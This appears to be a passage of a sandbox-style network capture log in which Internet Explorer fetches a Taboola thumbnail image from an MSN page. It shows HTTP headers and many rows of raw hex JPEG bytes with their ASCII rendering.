JFIF&""&0-0>>T&""&0-0>>T7"6
2021-12-02 23:42:43 UTC	19	IN	Data Raw: c4 8e c5 f3 1d f9 67 55 9d b6 e6 a4 be 13 91 3f d9 4a 2f 2a 7a f3 e9 78 4d 50 b7 d0 fd 3b 81 a3 cf 00 00 00 f8 c5 7d 9c 64 75 80 38 01 de 00 00 00 00 01 e7 d0 1c 3e 88 ff 00 43 a2 53 9c b0 8f 62 00 fc f9 c3 bf a6 e3 8e 01 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 3b 10 00 00 06 02 01 03 03 01 05 04 08 07 00 00 00 00 01 02 03 04 05 06 00 07 11 08 12 21 13 14 31 41 09 10 15 20 61 16 17 22 51 18 23 24 30 32 33 36 42 34 40 43 44 50 60 71 ff da 00 08 01 01 00 01 09 00 ff 00 ca 32 eb 6e 9a 20 6f 7f 50 4f ad ad 48 2f 41 a2 d1 d1 9d 65 69 39 25 ca 41 71 fd 2d ba 7c e7 80 b7 b3 ea 7b 42 bd 50 84 25 dd 0d ef a5 17 21 8e 1b 0e 33 6a 6b 09 b7 24 6d 19 75 ff 00 93 b9 df 5b 47 2c e6 2e Data Ascii: gU?J/*zxMP;}du8>CSbH;!1A a"Q#$0236B4@CDP`q2n oPOH/Aei9%Aq-\|{BP%!3jk$mu[G,.
2021-12-02 23:42:43 UTC	20	IN	Data Raw: 8c 16 e4 2f fd 16 d2 92 cd 4b d8 93 ed 83 1f f8 a4 79 e5 d3 6c d9 30 54 84 12 e3 ea dc 5c ea 20 9b f2 58 b5 f4 dc 0a 6a 3b 48 ad 8e bb 65 48 b2 0b af 60 9b 77 e1 77 e0 3c 88 88 e4 54 4b b9 f9 a8 a8 86 64 9c 40 8e a5 64 d4 4c dd 2b ec 67 15 4b 32 b4 79 45 fe f2 be 44 3c 28 92 6e 98 9b e4 e9 a1 eb 71 e8 1d 64 95 43 c2 84 ef c2 0f 71 70 13 e4 30 52 c3 a7 cf 22 20 a2 00 38 64 04 30 50 03 7d 05 bf 03 8e 19 83 a4 94 6c 7c 83 5b 86 a0 82 a7 6c a8 14 71 b2 8a 20 72 ac 89 e5 68 15 69 f5 04 eb 27 6c d6 6e a9 4e d9 a6 f2 55 dc 6b a6 04 13 99 48 3d 7d b2 21 82 1a 75 08 58 bd c5 b4 0b 1c bc bc 83 6b 56 c7 42 32 11 a2 f0 91 d0 9d 56 75 82 9f e2 64 42 73 a4 9e a0 6f 5b 20 ad e3 ef 2e 71 56 3e 3e 17 62 06 f9 2b 98 c4 fe 84 4e 4e 69 87 05 6f 20 8d be 54 87 fe d6 c1 3b 8c Data Ascii: /Kyl0T\ Xj;HeH`ww<TKd@dL+gK2yED<(nqdCqp0R" 8d0P}l\|[lq rhi'lnNUkH=}!uXkVB2VudBso[ .qV>>b+NNio T;
2021-12-02 23:42:43 UTC	21	IN	Data Raw: 99 bc 5c 45 a7 27 5c 04 d9 d3 b3 00 ab f4 ad 7f b0 f6 56 a9 b7 a8 59 c9 9b 5a ee 99 b8 dd d5 ea fc f3 c9 88 ee 91 99 d8 ec 77 07 73 f6 42 6c c9 d1 b4 6c bb 7c b0 e2 69 81 84 7c 7a 24 12 f0 00 ab 50 0c 51 b0 77 64 d0 15 16 27 e7 2a 89 92 56 f9 23 20 a6 72 63 00 a8 61 49 d8 87 d4 1e 62 ee c0 8c d6 36 6b a9 a0 61 ae 20 d9 09 86 78 a6 01 e4 36 5c 81 a4 6d 4f 96 11 7c a0 89 f0 56 50 a6 f0 6a 6d 81 d3 77 e9 36 30 46 3a 31 78 f2 47 e0 05 0f e2 3b ee f2 08 73 b0 64 00 b0 6e c8 51 2a 9e 92 0e 14 e6 d4 4f d9 1e 9c 34 35 65 82 6f 2d fb aa bc d1 c3 c7 95 1a 7e f4 84 b7 cd c6 c0 bb 83 e9 ed e3 5a b6 8d b4 5d 8e 78 74 54 67 0d 1a 92 a6 40 ff 00 a9 78 f9 c3 88 7f 23 80 09 b9 e2 f4 e8 19 c2 2c b0 1b 5b b6 f4 6b 0f 1d 9b 1e 2a 54 c0 0b c9 5c 9c 30 ae 8d f5 17 ef 78 8f 72 Data Ascii: \E'\VYZwsBll\|i\|z$PQwd'V# rcaIb6ka x6\mO\|VPjmw60F:1xG;sdnQO45eo-~Z]xtTg@x#,[k*T\0xr
2021-12-02 23:42:43 UTC	23	IN	Data Raw: ef 5d c5 4a 35 e7 39 ce 47 39 c4 57 55 9b a6 ee 91 34 04 db 39 b8 a6 72 cd 46 67 ec ec d0 92 8f d4 72 d5 e5 73 a0 0e 9d 60 c0 e0 f9 8c ef 45 1d 39 4c b2 55 04 aa 52 df 66 e4 10 bb 8c 2c 25 ef 69 74 95 b7 b4 fd 1d 3b 74 f0 26 a9 d3 2a 40 02 57 64 1f 9c 2a e4 1f a8 2a 5e 7e 40 c0 3f 51 c3 60 e0 e1 c3 9c 51 3f 02 02 15 8d 93 01 71 a9 30 a0 ec d5 6d 35 39 4a 54 c2 ad a7 9a 55 ec 96 4d 7b 61 8a b7 42 bc ea 20 95 bd f9 48 63 be 29 89 95 42 9c 00 c5 1c e7 ee f9 0c d3 97 46 91 2e dd 42 4b b8 fc 97 3a 9c 25 ea a9 31 5b 9b 47 6c f4 49 b9 f5 b3 c7 2b 40 47 49 36 79 14 f1 46 52 0c cc a8 7f b4 fe ba a1 f0 7a d5 3f 60 5c 04 e1 5b ae e9 9e 82 b6 75 a6 51 bb dd 8d 8f fe ce 0d 3c b0 1c 58 59 5f fd 9a 4b 80 a8 78 ed a1 23 f6 73 6e 64 96 e2 3e d9 33 d0 cf 52 f1 8b 9d 26 d0 Data Ascii: ]J59G9WU49rFgrs`E9LURf,%it;t&@Wd*^~@?Q`Q?q0m59JTUM{aB Hc)BF.BK:%1[GlI+@GI6yFRz?`\[uQ<XY_Kx#snd>3R&
2021-12-02 23:42:43 UTC	24	IN	Data Raw: 92 f9 64 ff 00 0b e4 e5 59 fb 4a b4 59 8f ee f9 ae 5c d5 51 db 9b 29 f6 72 a2 1c d1 26 d7 45 c1 38 93 31 d8 aa 44 b5 a2 f1 62 31 31 19 54 8f fa 8a 44 e1 c5 cd 1e a4 40 41 d3 11 88 52 aa 19 61 07 b2 f9 57 49 ba 9f 93 ba 82 f7 86 0a 6f 63 c1 20 c4 91 0d 9d a0 98 dc 50 bc 6c 25 e2 e3 17 11 39 f6 12 af 2b 21 3d 85 a6 e1 31 6d 4e b0 4c 31 22 70 44 2d e6 99 a7 53 25 8f 07 f0 32 9e cf 0d ef 60 be d7 10 0f 78 5b 8a bc 15 5f 4c dd 66 8e a6 92 a0 e8 af 4c b0 c6 6e 2c 81 8c 89 ef 19 3c 9c f7 c2 82 0f 4d ee 2d df 8b 7b a0 e6 bc 02 0a e0 8e 16 d8 32 11 94 53 60 54 69 22 d2 25 57 7b 1e c0 29 d3 6b 66 f3 11 1f 81 4d a8 4c 4d cc 0b e7 0b 72 2e 90 ae e6 40 b1 1c c4 a9 28 54 78 e5 36 a6 e1 e6 bc 72 db 14 35 33 fd 24 c2 35 db e8 bc 56 5e 30 11 20 93 cf a5 d3 5e 22 08 27 fe Data Ascii: dYJY\Q)r&E81Db11TD@ARaWIoc Pl%9+!=1mNL1"pD-S%2`x[_LfLn,<M-{2S`Ti"%W{)kfMLMr.@(Tx6r53$5V^0 ^"'
2021-12-02 23:42:43 UTC	25	IN	Data Raw: ae 3e a5 a5 88 a2 73 8a d5 da b7 20 d3 43 66 41 18 f9 d7 1b 70 ad 9d 52 00 42 ae df a5 1d 4b 7d 29 90 4d 68 58 de bb 51 00 b5 c8 ea e0 f6 0c 0b cd 37 78 a1 00 d6 fc e8 c8 f0 9a 9a e5 f3 ae 2e c0 e2 38 77 b7 ab 4e b4 64 9f d6 0a d7 0f 78 71 56 2d 5f 88 f3 6d ab c7 4d 42 48 ad 22 b1 41 ae aa db 70 a0 99 63 24 48 80 08 1f fb 41 90 8f 48 0b 8d e2 8a 86 13 b1 e9 51 51 e0 4d 0d aa d3 41 fb 62 69 da 43 ab 2a c1 c0 2a 20 8a b2 85 03 24 00 03 92 00 ff 00 76 4f d6 a3 c3 87 54 37 7d 47 71 1a 64 c1 ad 23 bf bd 68 58 81 8f 85 32 b4 f5 14 14 9a d0 dd 45 68 35 a4 d6 92 33 41 81 52 1b 7d e8 69 c4 c1 e8 68 a9 52 27 9e d4 6a 48 22 09 11 cc 7e 02 aa 77 02 80 03 61 f8 b4 51 45 35 e5 8f f1 7f ff c4 00 49 10 00 02 01 03 02 03 04 06 07 04 06 07 09 00 00 00 01 02 03 00 04 11 05 Data Ascii: >s CfApRBK})MhXQ7x.8wNdxqV-_mMBH"Apc$HAHQQMAbiC** $vOT7}Gqd#hX2Eh53AR}ihR'jH"~waQE5I
2021-12-02 23:42:43 UTC	27	IN	Data Raw: 00 b0 a0 02 d7 56 b3 0a 53 3b 90 1b 2d b6 6b b3 45 82 e1 64 b0 66 90 92 7a e5 4a 20 ab a9 d4 74 96 cf 52 8e 22 47 91 47 74 ae d7 db 1c f5 59 2d e6 51 f8 83 2d 5f 30 8d 00 62 54 dc ca 7c ce 22 4f d1 6a 78 17 ea ad ce 9d 3c 40 01 e1 92 50 56 9f 78 b1 10 64 e4 5a a3 cc a0 f4 20 3b 3d 18 c6 89 65 c5 d7 27 d6 66 df 98 de 6c 4b 03 dc 1c 9d 33 55 b5 bf b7 3e 38 d4 11 a3 61 f3 b6 ef 44 7f cb 53 56 ad 22 b0 60 fc 84 04 10 72 0e 45 13 dc fa 4e 05 64 35 dc b8 3e e0 d4 7a d5 dc 51 ae 07 05 fd 93 cb d0 63 05 92 4f f8 6b 4b 56 72 9b db c2 d1 33 fd fe 25 5d 87 96 4d 68 b7 19 ff 00 4b 1d fc 71 3b f9 12 0f 2c 83 57 a8 33 b3 c7 ac 33 20 f8 f0 dd 0d aa f3 0a c7 da d3 f2 f2 26 3c 46 38 8e 2b b4 f0 06 f0 b8 b3 53 fa c0 2a 4d 46 13 32 a9 2d 02 c4 63 3d 72 c5 71 93 81 d3 02 b8 Data Ascii: VS;-kEdfzJ tR"GGtY-Q-_0bT\|"Ojx<@PVxdZ ;=e'flK3U>8aDSV"`rENd5>zQcOkKVr3%]MhKq;,W33 &<F8+S*MF2-c=rq
2021-12-02 23:42:43 UTC	28	IN	Data Raw: 71 67 2f 67 f4 86 b6 d5 af 9b d9 4e 7b cd 24 d1 b1 51 3e 4b 2b 6f c1 82 6a c7 b2 5a 66 a3 76 6e 2d 34 0d 32 08 2f 75 a7 31 ae 12 31 7a b1 92 5c 71 e2 5e 52 14 35 05 fc c6 24 88 eb 3d ad bd 9f 58 ba b9 45 50 a0 4b 6a d2 84 1f 84 95 d9 1d 1e fe dd d9 a0 b8 d3 fb 3d a7 d8 0b 72 e0 ab 70 48 22 79 00 2a 48 20 b9 ab 1d 5d e4 50 3d 51 f4 94 31 27 f3 42 f6 dd c1 e9 0c ac 37 56 00 83 f1 06 ae ec 41 eb 1c 13 32 c6 7e 31 1c a1 f9 56 95 ac 01 c2 0b 49 6d ea 53 7e 12 5a 70 29 3f 79 0d 6a ba 4c 8d d0 b4 6b 7d 07 e2 f0 e1 c0 fe 4a d3 af a4 ce 39 71 4d c3 27 e1 1c c1 1f f2 a6 47 07 74 75 2a 7e 47 d3 f4 67 36 ef fc e3 23 d0 06 af 72 99 85 fa fa 9c 5e 33 1f b6 7a 27 ce 92 e2 09 c1 6e c7 f6 62 e3 79 75 6b b7 19 4b bb 90 73 88 6b 4e bd d6 23 42 96 dc 65 ed 52 de 3e 1c 72 e1 Data Ascii: qg/gN{$Q>K+ojZfvn-42/u11z\q^R5$=XEPKj=rpH"yH ]P=Q1'B7VA2~1VImS~Zp)?yjLk}J9qM'Gtu~Gg6#r^3z'nbyukKskN#BeR>r
2021-12-02 23:42:43 UTC	29	IN	Data Raw: f2 3f c8 6d f9 d6 f9 c9 ac 5e 76 d7 b4 30 e8 f1 f9 cf 64 0a 41 27 0f bd 52 49 cd 68 3a 95 cd ee 98 91 43 a4 59 5c 5c 69 d1 cd 27 1a bb 3c d2 5d 24 68 b2 70 a9 1c 40 93 c4 6b 55 d6 6f ee af f3 a5 da db cd 06 bd 35 9a 18 e4 21 a4 7c 5d 71 c3 c4 ca 08 6d eb 91 a8 68 1d 92 b3 b0 96 d5 6d c4 11 25 d6 b5 70 f7 d2 fb 1f 52 55 82 28 03 28 a0 52 4d 5e 6b 2b 66 ce 71 6f a5 81 66 a0 7b 8c a9 2b 8f bd 43 d1 9f 46 36 35 98 b4 d8 1c af df 6f 60 0f ce b7 63 93 59 f4 74 8d 8f c8 50 63 75 a9 eb 3a 8c a3 ca 49 64 8e dc 13 f8 43 59 3e 42 86 04 ae 8a 07 4c 21 c7 a0 d1 78 e5 38 c6 7a 1a db 3e 9f 6a 52 89 f8 67 26 b7 58 db 15 03 dd df 69 37 3a dd aa ce 5d 21 37 13 5b 6f cd 28 3a 0f eb 02 4d 76 66 ea d6 d1 78 ee 2e 2c b5 07 e3 54 d8 67 82 0b bf 67 f1 4a d4 34 db 8d 42 44 82 de Data Ascii: ?m^v0dA'RIh:CY\\i'<]$hp@kUo5!\|]qmhm%pRU((RM^k+fqof{+CF65o`cYtPcu:IdCY>BL!x8z>jRg&Xi7:]!7[o(:Mvfx.,TggJ4BD
2021-12-02 23:42:43 UTC	31	IN	Data Raw: 00 25 a3 a9 8d 2a 78 a5 be 55 84 46 e2 19 c1 8e e2 dc 8c 90 5f 94 c6 ad a6 d2 75 bb 35 b3 9a 68 be bb 90 67 82 6f b6 92 21 ef 00 9a 9c 58 42 48 18 96 2c b2 81 9f 16 dc 53 4f 6d 21 49 55 50 e1 c3 29 04 14 3e 15 1b 5b da 37 33 94 ed 8e 71 63 9c 92 01 db ce 91 ef b5 8b b0 27 65 90 30 58 55 b8 f0 59 49 18 66 c6 de 18 a8 de d3 48 b0 16 5a 7c 44 63 9b 23 82 bc cc 0c 1e a5 a4 26 81 d4 24 49 2e af 2e 0b 9e 18 d6 45 0e a8 c3 c3 80 02 cc 7c 73 58 2d 9e 13 e0 d8 f2 fd dc b6 1d 94 ed bc 70 44 f7 ea e7 fb 27 51 81 c4 96 b7 d8 c8 05 15 c0 13 0c 8c ad 40 93 d8 3a 72 1a 45 12 bd dd bc fc 42 3b ab 49 99 32 f0 9e 1e b9 ca 9d 88 06 8f 0d c6 5d 5c 9c 97 df 04 d2 2e b1 a1 da 16 d2 ae 24 dd c4 1c 7c 76 d3 8f 12 2d a5 c2 3f d8 20 54 d6 9a 85 84 ef 6f 75 6d 32 94 92 39 23 3c 2c Data Ascii: %*xUF_u5hgo!XBH,SOm!IUP)>[73qc'e0XUYIfHZ\|Dc#&$I..E\|sX-pD'Q@:rEB;I2]\.$\|v-? Toum29#<,

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49836	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 23:42:43 UTC	15	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b0a39109a3b849d0b2174b409fe1c7f.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-12-02 23:42:43 UTC	32	IN	HTTP/1.1 200 OK Connection: close Content-Length: 24996 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 431871724519518595264236355100961167699,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "197a03ec48c7736f48fa984c7564d0c9" expiration: expiry-date="Mon, 27 Dec 2021 00:00:00 GMT", rule-id="delete fetch for taboola after 30 days" last-modified: Fri, 26 Nov 2021 12:35:17 GMT timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-envoy-upstream-service-time: 28 X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 02 Dec 2021 23:42:43 GMT Age: 554337 X-Served-By: cache-bwi5045-BWI, cache-dca17768-DCA, cache-mxp6946-MXP X-Cache: HIT, HIT, HIT X-Cache-Hits: 1, 1, 1 X-Timer: S1638488564.622159,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F2b0a39109a3b849d0b2174b409fe1c7f.jpg X-vcl-time-ms: 1
2021-12-02 23:42:43 UTC	33	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 0c 0c 0c 0c 0c 0c 0d 0e 0e 0d 12 13 11 13 12 1b 18 16 16 18 1b 28 1d 1f 1d 1f 1d 28 3d 26 2d 26 26 2d 26 3d 36 42 35 32 35 42 36 61 4c 44 44 4c 61 70 5e 59 5e 70 88 7a 7a 88 ab a3 ab e0 e0 ff ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c2 14 14 a3 58 0b 33 16 a9 c1 db 37 fc ba Data Ascii: JFIF""$$6&&6>424>LDDL_Z_\|\|((=&-&&-&=6B525B6aLDDLap^Y^pzz74X37
2021-12-02 23:42:43 UTC	34	IN	Data Raw: 0e 8e 77 56 42 37 d0 84 87 36 c3 bd f8 38 d6 50 f2 2b 32 28 3a 55 2b be 79 ae b8 f6 62 d4 5d 98 f6 39 91 14 c6 fb 1c ef a7 b1 ed 6d 31 1d 83 f5 17 f6 c0 f3 24 d2 40 60 e5 6a 52 32 6d e7 a1 98 78 15 0c 1b ca 30 0b 02 e2 20 d2 88 97 c6 45 62 22 94 36 95 da 31 e7 b7 e8 af 31 df f9 53 d9 f9 af a7 33 e8 b5 0e 72 1b 49 4b 0c b2 fb 0f a5 61 04 64 01 c8 37 bb 05 f8 32 ec da 58 68 d2 11 95 75 eb 55 22 ac 9e ad 77 58 f7 42 7a ae 7a a2 ab a5 19 b1 6f a7 d3 c9 b0 29 ce a1 d0 29 bd 85 85 b9 3a 92 8c 90 48 01 63 46 ac b0 5f 9c 38 99 c6 0d a5 14 9c cb 55 53 2d 10 8f a5 56 ef b1 78 d3 a0 73 ed ab 61 12 ef bc 79 de b2 86 c5 97 bb ca 67 23 1d 23 69 a3 4c 92 12 2b 08 34 01 fc 55 49 5f 3c dd cf d4 4a 65 19 2c 08 e2 bb 43 89 69 f4 b0 5c 52 28 96 a1 b7 6b 57 e7 68 54 d2 bb 4f Data Ascii: wVB768P+2(:U+yb]9m1$@`jR2mx0 Eb"611S3rIKad72XhuU"wXBzzo)):HcF_8US-Vxsayg##iL+4UI_<Je,Ci\R(kWhTO
2021-12-02 23:42:43 UTC	36	IN	Data Raw: 3b a8 18 54 9b e7 f2 70 b3 e1 05 0a ee 24 7a f9 50 83 71 b1 c4 7a 4f 4d f6 c5 59 8b 85 5e 4a 0f 0f f2 c8 35 02 5f dd 6d 07 1c fe fb f9 8e fd 5f c2 6f e3 d5 c3 13 3d a2 0c bf 5c d7 36 0a 8c 96 23 8f 16 e0 74 94 ef 57 07 da 22 d3 76 2b db bc 49 35 e2 a3 9e 80 f5 4d fb bf 43 c8 33 2b 54 de 3a 22 fa b6 ac 44 a8 c7 7a f6 f2 5a 94 03 10 69 e8 ce 36 43 5a c2 07 14 b5 cb c7 73 6c 4b 86 62 4c 6e d1 cc 2b 3f 94 4a 27 ad 5a 4d da 0d 7a 49 73 88 42 b5 26 ee e6 50 f4 58 8e a7 75 7d 16 4e fa b1 a9 6a c4 fb 62 0e ab 15 89 ea b2 51 cf 70 98 fc 81 a4 29 25 3d 72 b9 de 3e 84 52 02 d8 dd ef 68 b4 5e 1c 9f dc cf 47 72 26 63 ae 47 e0 4c 93 cc 4a ab 1a 8d 98 b1 d4 d8 8c 1e b6 b1 2c 63 5b b5 29 d6 7a 73 3d fd b1 19 d5 ef de 21 3d 15 1d 15 09 71 f2 2e 2e 4b 0a 5c b5 6b 95 14 35 Data Ascii: ;Tp$zPqzOMY^J5_m_o=\6#tW"v+I5MC3+T:"DzZi6CZslKbLn+?J'ZMzIsB&PXu}NjbQp)%=r>Rh^Gr&cGLJ,c[)zs=!=q..K\k5
2021-12-02 23:42:43 UTC	37	IN	Data Raw: d1 13 73 91 34 02 3a af 3d 60 ed 3b 20 5b ae 07 9b e9 3b 2d 10 45 a9 65 e6 88 10 f3 6e 37 07 d4 15 3c c9 c3 15 60 16 ba 66 11 68 35 40 a9 95 b6 48 2d 5f 25 99 a2 9a 69 da 08 38 47 96 6d 02 d1 43 d8 1c ab 38 be 30 7a 2c c0 58 ac 7a 8a ca 4a 17 f9 22 d6 c3 ac 53 ba 8e 5a db aa 7e 8c 01 6c 8a d6 9a da 3c 53 3d e4 9e 8e 6f 8b 60 02 cf 94 9c 39 77 48 32 1a 63 59 22 80 44 0c 15 74 e4 17 9a cd 43 61 45 23 ab 1d 9f 4c 86 a7 e2 21 af da 15 7a e5 27 8a c5 69 dc a7 28 8f 7b 82 dc 0c 8d df 27 4b 45 f3 5c e4 35 cc 7b d7 0b 34 eb 7e 35 1b 55 29 58 65 ad 62 4c 9d 8a 94 80 e2 7d 05 85 6b 4c 02 44 ad 95 8b 56 2e 23 ab 7a 56 0c be 8c 44 ff 00 de b6 51 98 ff 00 2d 27 15 72 44 7a 8c 4c 87 43 6f 2a 4c eb ec 29 4f 09 32 7c aa a4 98 ab 6b 87 50 25 88 a8 8f b9 b9 88 96 ba 79 ce Data Ascii: s4:=`; [;-Een7<`fh5@H-_%i8GmC80z,XzJ"SZ~l<S=o`9wH2cY"DtCaE#L!z'i({'KE\5{4~5U)XebL}kLDV.#zVDQ-'rDzLCo*L)O2\|kP%y
2021-12-02 23:42:43 UTC	38	IN	Data Raw: 2f 90 45 47 75 44 d0 f4 d5 34 fd 47 8e cf 57 a0 ae 35 73 4f 46 1c 3c c4 9c 56 21 fc eb 4f 0a 6a 44 16 b2 e2 76 ca 47 05 fc b0 79 47 1d e1 6a e9 ea 68 fb 1f 63 e3 4a ab ac 83 79 2e ff 00 a3 1e 56 c2 4f 2b 6f 7c 85 fc 59 80 ed 31 b7 72 b5 f3 e0 80 2d 1b 98 9e d6 9f 8c d1 a1 9f 7f 66 d0 5b 47 d7 18 fa f9 1b 5a 32 b8 61 c0 29 e2 e8 0b 33 8e e5 21 d1 94 15 a9 55 09 54 95 14 18 37 11 95 14 55 a8 a0 4a 4f 02 c8 60 e1 25 18 8f 36 ab 73 c4 2f 15 a1 6d 81 5c 30 71 fd 47 74 41 c6 04 ba 7c 7b 3e 16 bf 2c 2f 30 7d c1 ea f1 b1 e6 67 8b 4b 28 b3 16 18 9a 12 a2 0a d3 a0 55 0b 42 d4 8c 37 7b 50 2b 90 f0 d1 17 1d 49 ea b1 99 3c da d6 8b 67 9b 42 8c 59 85 7a e2 65 ca 7b 04 4c 2e 3e 45 c9 6f c6 af 9d 63 4a e7 ce 3d ea f0 5e e6 5b 35 d2 6e 40 a4 e7 70 ed 83 d7 d8 b2 c4 99 ef Data Ascii: /EGuD4GW5sOF<V!OjDvGyGjhcJy.VO+o\|Y1r-f[GZ2a)3!UT7UJO`%6s/m\0qGtA\|{>,/0}gK(UB7{P+I<gBYze{L.>EocJ=^[5n@p
2021-12-02 23:42:43 UTC	40	IN	Data Raw: 5b 51 d9 c5 87 d6 87 7f a6 e5 fb 2d 92 06 4d 57 1b 8e 01 a3 4b f2 6d 79 6a 69 a2 dc ac 6f b8 be 68 72 5d 51 d6 6e f6 a9 f1 ae ed 5e 88 6d 76 54 3d e9 68 5d d8 19 68 4e c9 72 6d 0f e7 bb 89 72 d5 6d 4f 06 02 be ee 6b 73 58 ab 56 d4 00 7b c9 62 0c 13 56 27 ce c1 bc 77 f5 93 5f 87 71 2d 3f 39 73 17 47 e2 05 cd 17 be 1e e3 df 1f 73 14 a9 7b df 22 6b 6a de 69 68 c2 e5 c2 6d 41 85 ca a8 4a 18 37 88 ad e6 aa c0 44 51 32 b8 3e c9 80 b0 83 fa 8a da 7a d0 12 ce 67 5d 52 53 8f 89 5b 61 e7 d5 59 e4 83 b7 8a 8c 45 6e 70 1a d7 1c f4 e4 45 54 66 fd f6 c6 09 46 a6 8a f0 54 2f c8 9a 6e 9a 9a 1b 1c 5b 28 d9 05 50 29 e9 91 6c d6 3d 0d 0a f3 47 90 0b 70 46 54 34 da 2a 1a 47 0e e4 0b ab f6 4c 75 37 6c 13 7a 9a 88 6f ca b1 7a 4a 3c a9 b5 fb 52 48 1e 45 94 6e de fa ab 01 6c 94 Data Ascii: [Q-MWKmyjiohr]Qn^mvT=h]hNrmrmOksXV{bV'w_q-?9sGs{"kjihmAJ7DQ2>zg]RS[aYEnpETfFT/n[(P)l=GpFT4*GLu7lzozJ<RHEnl
2021-12-02 23:42:43 UTC	41	IN	Data Raw: 6a a6 0d b6 ae db a3 4d 9b d5 c4 57 3f 1e b3 5e da c7 4b 94 61 99 b5 a2 2b 04 bd a7 a9 1f 6b 7e fa 24 c4 fe a3 a4 18 10 71 c3 7b 74 eb 96 60 93 da 50 48 ef 36 15 47 d6 93 a9 64 8a 13 ce 08 1c 23 5e 65 2c 0e e4 ad ef db a9 64 07 5a 83 bd 27 c8 88 91 69 eb 8b e7 82 fe 4c b5 47 78 b6 75 6d 0d a7 d6 6f b1 69 65 03 c0 49 12 2a fe f9 27 69 cf 1f 50 42 1e 56 0c c8 ed eb 77 fa e9 f0 db 49 05 82 bd 38 a6 1e 1b 45 34 69 b5 f9 f0 33 ea fb 8c f2 3d 1f b8 60 50 55 a6 88 e9 85 a2 a1 2e 56 af 65 82 bf 7a 56 3b f5 95 c7 11 d1 5a 97 bb fa 1c 28 10 09 2e 69 d9 41 c5 a6 28 d0 6d fa 89 ef d4 de f3 58 ac db a5 db 3a c4 f6 06 f6 2c 48 e2 bd 20 4f 1b 5f a4 13 bb 07 2d 6b 6b f1 c6 7b cc cb 2f 5e 3c fc fb 60 9e 3e 88 a9 df 29 8a 5e 97 ad fa e5 aa 88 75 a3 cb d5 33 d2 dd e7 be f3 Data Ascii: jMW?^Ka+k~$q{t`PH6Gd#^e,dZ'iLGxumoieI*'iPBVwI8E4i3=`PU.VezV;Z(.iA(mX:,H O_-kk{/^<`>)^u3
2021-12-02 23:42:43 UTC	42	IN	Data Raw: ed 30 64 c2 9a 86 50 c7 c0 10 7b 83 3f 6b d8 44 60 2c 47 c9 4c 36 1f 32 e2 98 4c 11 e9 71 d7 93 51 31 83 91 36 aa e4 45 dc bb 79 34 3f 12 c0 17 5f 30 b5 11 bc bb ab 13 9f 9b e8 44 26 89 87 22 83 46 58 3d 0f 47 b2 6e 28 63 bd d0 1c 98 d6 50 6e 4f 42 e7 61 fd 23 b4 5d 81 68 4d 92 7a 01 d1 05 9b f1 28 11 44 5c a5 c6 8d a0 51 3b 40 ba 55 54 76 84 83 e2 6e 4f 70 7e 7b 7f 79 e4 ef f0 06 c6 6f 74 3f 60 ce 04 22 6a 22 ec 11 66 58 63 ba 8b 3d e5 0a 14 77 da 04 5a e4 cd 1f 3f de 69 31 c3 5d d1 98 d1 dc 13 a5 b4 77 6a db 68 fe 9b ff 00 13 e5 c8 fd 81 0a 21 1d 03 30 e0 c2 27 d1 05 35 21 36 39 06 03 09 98 85 28 be e6 5d 4e 72 22 d7 16 c7 a5 8e 3e 4e df ee 76 f3 66 72 40 ff 00 3c 7e e0 ef 60 df 89 df 93 b4 2d 40 ef da 38 25 69 68 c5 04 30 b0 62 ae fc 93 5d 8c 68 de ee Data Ascii: 0dP{?kD`,GL62LqQ16Ey4?_0D&"FX=Gn(cPnOBa#]hMz(D\Q;@UTvnOp~{yot?`"j"fXc=wZ?i1]wjh!0'5!69(]Nr">Nvfr@<~`-@8%ih0b]h
